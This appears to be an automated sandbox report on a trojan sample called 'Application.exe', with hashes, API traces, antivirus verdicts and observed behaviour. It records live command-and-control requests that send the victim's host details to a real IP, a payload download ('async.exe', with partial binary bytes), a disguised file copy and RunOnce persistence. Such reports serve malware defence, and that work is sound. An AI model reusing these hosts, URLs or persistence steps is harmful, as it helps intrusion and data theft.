popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Application.exe

Malicious Library UPX PE File OS Processor Check PE32 .NET EXE
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 7, 2023, 11:35 a.m. Dec. 7, 2023, 11:46 a.m.
Size 285.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 3ba788943ce69ebe9bbd218606fd8547
SHA256 13f53967b03017371c9385a4266b5f3169afe48e933a5cbbf95f24843c05f376
CRC32 CFB4A7D5
ssdeep 6144:xOsvv2XehpGU3HufTii8q0xH9h6edHyQYQFRkVli17iJiy8BNg2AOxT4hR:9BHL6edHytQEiy8BNg2khR
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
91.92.247.161 Active Moloch
91.92.247.96 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: 1 file(s) copied.
console_handle: 0x0000000000000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001af1eb50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: f Aq‚ºbVÙ œÎÍ Œb“R¦›êNÔþ1«·†£
crypto_handle: 0x000000001af1eb50
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 8
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.96/async.exe
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29
request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
request GET http://91.92.247.96/async.exe
request GET http://91.92.247.161/zhark/api.php?id=b98311500ce6100fb01cd1be7ad4b7db&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B&tsk=29
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 2424832
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000ac0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000c90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d61000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef33fb000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000700000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000720000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d62000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef2d64000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fffff00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe9365c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93660000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935cb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935cd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe93710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe935a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2400
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fe936d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description gfsvc.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
description Application.exe tried to sleep 540 seconds, actually delayed analysis time by 0 seconds
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
cmdline cmd.exe /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
cmdline "C:\Windows\System32\cmd.exe" /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
file C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
wmi SELECT * FROM Win32_Processor
wmi SELECT * FROM Win32_BaseBoard
wmi SELECT * FROM Win32_DiskDrive
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL˯peà" 0ø!" "@ @"@…Ä"W "  H.text$÷! ø! `.reloc "ú!@B"H ò¤$!v"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceAq‚ºbVÙ œÎÍ Œb“R¦›êNÔþ1«·†£æPø*ÖsÒHz;}–Q‚A0'ëÁÏšžïbð>Â<Nơܑ˩‡2rÐHÍŤÉQ”É]êŽhñwþÅ| +ÌIsp2r˜C‡)¤’K+ {à ¸¸•²>ç(G·ñäQ@Ƕ-5#)*Båä)}ñ¤`»&$Á­lþQö.OÈd0D¦ĕªëÛbo&ä1ö[ÅN’fTO76‹eí§`›Ù·!B·ä-bP¼›rˆЃXzov\'7éùƒ‰§©ÿ)FÅbpŠþwè,ZU†Ñ%›%<+mn™FaŠ1€Xçêßꍽa Œå§’]<éé@Në?`AqçÎñQ_ÕRb­†âðöìb˜ŒèÈ% š1¤qÓÁðÙ龜DãËÿý?ÖÔJÖӁ]#ÎJ¢Çë`0ܺٷ4AoS<>x¿®Ke>úm·ø«ZÞð“*e‚Ú ÖrS¤)§Jÿ&;(÷MU í8ÅÄÍ¢Ê x‰Læ%Ä6Íq(ך{öÓ¡ Ž ĒwjVCanìVkêü{ܐp)–Šõ VFWޚtïûÝ]n!0ýÚ¤£þÁß[TŸäÑÄ(«Êì”&? Ár"þS_/îØËÖS^Õï¼lÔÿZÂÛ+s¥5^*IÌ`…ºDÍI õW!­Š¼Òð>7í_B™ЭçÏU弨¢UЩ…ñ|^X6ïÄΗKªëßf‡WKPaké…{hR–S·0ÁJH2-,R³Ç}TÁƒêê+J<ZªYIž¹ñzE%O§âòdsò÷™3kç>Ro‹Ååß M¾Í•*qŸúóÛ^Å~èéäv¶¾%¨ã†ÂB$bé:WC¿¢NeŽ€çÇùªçÌe“¦ð·F"û&Xµ>¢¹Ãd×ÒÅD>ObŠ-ß1äâ>5“k6a‘ž½D„Þ³<Û/E…ÖPO=“Ö!q)k©Bµ2"kOÈB½d²Pa֌ž”ZáɺÏÙP°¯èځjßîJa螚(mqãXurâÉׯÌß*ìý·³£\暈g0¸¤´ )ú¾²’ß+n¥˜ —zIè5ªá¡ê¶ÕëSt–ýˆAÁ,IÜïÇÂëúÈÓ<ú.7+³³rjÓ|ªvMòx;§[çGÔ5Œæ²„‡«¸8kÕÚ¹dâ=g‚„fõ*ì cÙ Êó) …홪¸ÚÆ]ZoLZ”W*ŒìHÖ"Þ¨å™IׇçrãøVWÿ‹òV aÆNDLâwŠ$ÅlZÓlÀðá¹Û;ŒKA3J¸ûɆ Ÿ-’ÀӓB•G1Ä £ÉÓ^ÄðÔc ¥hqʄá3cžò{Ä?MyÜ×äܚ³–rDœ'˜:1yœìŒÖˆ.ö¤Wԏµ•»¥Ô Žø«jñç­/åÍ¿¤b8AæsªV÷çå­ü‡‘Œ9#dBE#ÑãwÊ\@aûËäºÿÔ¦¦=ÊìÖÞ´s­3(ºRS3n3êì[½2€R›Ôϒ/1㠟9\±P‹`3d oÔÈ]¢#/`r~û(ø¤RtçeáýÓ|«6òUzN…ïæþ¿Ícþ¤ã ]üéZÀ]âut_„xˆO^.OpÖÜ¡Ø%”5NW:³/\˜z"§°Ù뮙Ÿ@z´CLÂ.õʚ 5 …edِ»aN¦Ó}+°K¨§ŽTB—»›¢¸­&w8î+ÊL)ß֗…TË·M§¢Ä¢²¼é ÑM«5°ÞeØ݄š=}͋μä§wýÛ7ÂIùZÇìÒ=Å3î³Ö³”û9áÛ^ÔþBÚ+!¦)9H 9ō;XÇö¹°À,¨öÄðÞs¸LGE«sìÂaÜéeÿ“ õSŒA܌¼T?€Ã½·jîÄLxìÕ#[:uõ®;'!Qô3XàŠ|-«š(RòFL©ÌàžüQxfWiᆛOPŒ¢ EuIMy©0ðŠ©ùHÐ\×»Âæ­äz¶øÙ\Iô ,"W—À, ìڄµqÄ¢Û£&FéôGFJ~:•ÀXq‹U2cW¨É¦}+Vù`Ñ 4½ò¨O[Ò¯ÆY´Ú€5ÏxäÁF¾=XÀTsΜ 1€:=ÅP¾Ñõëå1^Ç"1ëi›ú‘ÄpÁ´ž¢8ÞRámã†p"p¦èÊb’Ç“Å’ Ԅ¸ÛÝVBXÈB¹Ø[_»‚:i0ðf5¸1¼ÿ¿ÈŽV’QðëTQÄèŒ%ÎìQÃûBÜÄo…f© ƒ‚v·QçÿæBlì«ÌìbÌWÇ÷ußYËHzémHBŸŸ7î÷U! ?f…´€CÛŸVt>3Z ›ìô<ÖÁ8Äz? MðÉE7w„üÌh¿î¿h•ŒÊ,ÒÚZœa†´8k‹mõH}õ¼˜üÐØ÷£û=wìm"a:·x­èÕEû”Ì &óþs€Múb‰®ýUœlÀËr¹)RTDÅb(ß1HËÄ´ÔÚÿ£Äñ—`P»²cïàíë})¦8þæ¼7ÀÚ#™QÃõ¨Äð¾×G¯‚LcclÇ¡uþ¼\xŒª‹HŸ{ôd5\2í,ւ&à†ù[eµÝÀc‚#V]™‹ºËUàB ©«4lÓ̱za^‰]ßöI‘"JŸ6e¥;ï¿',]¶k§þ¢]ò%±K¢;³m“^€A88lyo4³Û»Qò‚‰þÍxãˆ\R‡ˆa-ÀlPi7ÃOIšZÞAt‹¥ƒŠá7zu›Î*L-àSpdcrlA;jJÁ| T˞ÃéI¯]+T6‘†·ðÇ^²¢jã=ææ‘ØOËÒÜüi„K®%-a9ÐnÞ±8vÑÐÔVhÐj±©Ào´‡É¦^@è²äƒ”d•Ë¥SÄa7MSÆ•—s ònf{ѱåîyÂdÝD ÕîtXu8|{´‹ëä}Z„ï¤î¤ë ææâ{&(ÂF1¶÷;°±jw«‡A7bX›vø¿Q2Q»WZ$ÕáÍt¬Ñ ë£KI‡Âz¸6”·æt<VøT=jÅßs”§¹ m;«¢€x”ÈüG·'NPáˆZùfuî{–>§LՃi¡±ð'Yù6QÍ­ç¡+M …Y»æ£XQu¬VL“¬ q^d•ÝBì…èͳÄH­]zn³Ãog…œ}t† ¾[”$»ƒžj™+¨±€\ÏÌdF®A•1ÚG^ºUáa| Ö÷ý`ŸZÓ $R™Õa°y`;!žFÐè‹ãx‰ ~ò tm⧅=ÚþÓ¯½7ÒClƒWÐÕ:ÍÁ£ž=%?ôy0EY­Šùo¦ cpî‡zÔa!¼züŸš¨ØBWhþzMÊ£å Ï=–œô4XâáÆ¢è_ÞµhRýÛáÂu„µ¦4Ñ Õ1ejèqý ·‰àèPqž°¡âÅ¥î²bCû÷6mi€Šco‹ܴ+)à$é3Ž Æòÿîðö]«ý­ÀÿMyøcقwÂö f¥®d¢§Ä4ïML'6ð„U'×q·—àAÏë <ñã²áßâþ+f„ÞU"šk¡òò5qúúZMrvºÕÃú{„­C»h®êŸ 3«oH¼‹§&g,ÌØáÀA?o¶wy«eå°;‹):†8󏈧z á¦C#(yâÀU8{àòÀ¹L?EÄÔÁŸ‚x[n2å`á;Ý°›ÈH0ÁmzǦâš=ÖTÌÅ%[Wcz&ÑCý·¼au‰›†At̙…oÜß×þ¹Ñ’¤-·—`-Ý>@AÚ£ˆ'Oy$Œåb•fŽ¬§…jS7²FºnÛ9)Ž~ ¿ó5€–GÁ/p\âõÂu£¤^ ½8ž{"e”io.a÷‡Ð(æi[P9–³lµ€¬GÐáä :?¿S†…ß ýÿù~ÄôûjiNRÂ4?b yýª ÿ~ÄÃOàÖRÔn m?ÜÑÑ)ìbáü‚­â¾0øNÉGêçþcsH!…îÛSÔk°`ÿ䏧tŸô<£þx¼Óã©®½ç×¾+;Òþ¿88 މòÈŒt꿱5Í.3—wÖx‘áÔ ¥Q.8@É¢·V^dÔëI²\à cdÂÞn…­az6Vm¶þÈ}jÕêï›$Ñ ª¿|‚%Vö©s¶ÁòÝÑ3§Ò„«ùv}‡ÊöŽFnԒÔe2õMê 1œîŠî2˜¯qI¤¢­z?:øýÔª3Ð.CHuþö‰—Ü`#‡×·Ø» k ußMÝû.w}H;k¾keGÕ8$#9ْRl,þSúZ>rÖZ’Ob„Ö—‚tÖ=—IŸz•ë¬_ŸëŠ™pÜj…š|²!p®Ê x2v¨â¤“²S7°¹þï3AÉ(û×x×âsÏQiaÇ
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

NtTerminateProcess

 status_code: 0xffffffff
process_identifier: 2400
process_handle: 0x000000000000037c
0 0
cmdline cmd.exe /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
cmdline ping 1.1.1.1
cmdline "C:\Windows\System32\cmd.exe" /c copy "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" "C:\ProgramData\svcSched.exe" && ping 1.1.1.1
wmi SELECT * FROM Win32_Processor
buffer Buffer with sha1: 75416d4212b2f460ecf7209bf89016ed60030d8c
host 91.92.247.161
host 91.92.247.96
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SystemBiosVersion
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Service Scheduler reg_value "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
file C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst
process gfsvc.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process gfsvc.exe useragent curl/1.0
Bkav W32.AIDetectMalware
MicroWorld-eScan Gen:Trojan.Heur.RP.ruW@bSJZebei
Skyhigh BehavesLike.Win32.AdwareLinkury.dh
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta AI:Packer.5FB5ACF81F
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky HEUR:Trojan.Win32.Agent.gen
BitDefender Gen:Trojan.Heur.RP.ruW@bSJZebei
Avast FileRepMalware [Rat]
Emsisoft Gen:Trojan.Heur.RP.ruW@bSJZebei (B)
F-Secure Heuristic.HEUR/AGEN.1319014
VIPRE Gen:Trojan.Heur.RP.ruW@bSJZebei
TrendMicro TROJ_GEN.R06CC0XL623
Trapmine suspicious.low.ml.score
FireEye Generic.mg.3ba788943ce69ebe
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
Avira HEUR/AGEN.1319014
MAX malware (ai score=82)
Kingsoft malware.kb.a.931
Microsoft Trojan:Win32/Wacatac.B!ml
Arcabit Trojan.Heur.RP.EA82A9
ZoneAlarm UDS:Trojan.Win32.Agent.gen
GData Gen:Trojan.Heur.RP.ruW@bSJZebei
VBA32 BScope.Trojan.Wacatac
ALYac Gen:Trojan.Heur.RP.ruW@bSJZebei
Cylance unsafe
Rising Trojan.Generic@AI.98 (RDML:k/ViMpBtJGzyRg1BpQ/bJg)
MaxSecure Trojan.Malware.300983.susgen
AVG FileRepMalware [Rat]
Cybereason malicious.f63d4b
DeepInstinct MALICIOUS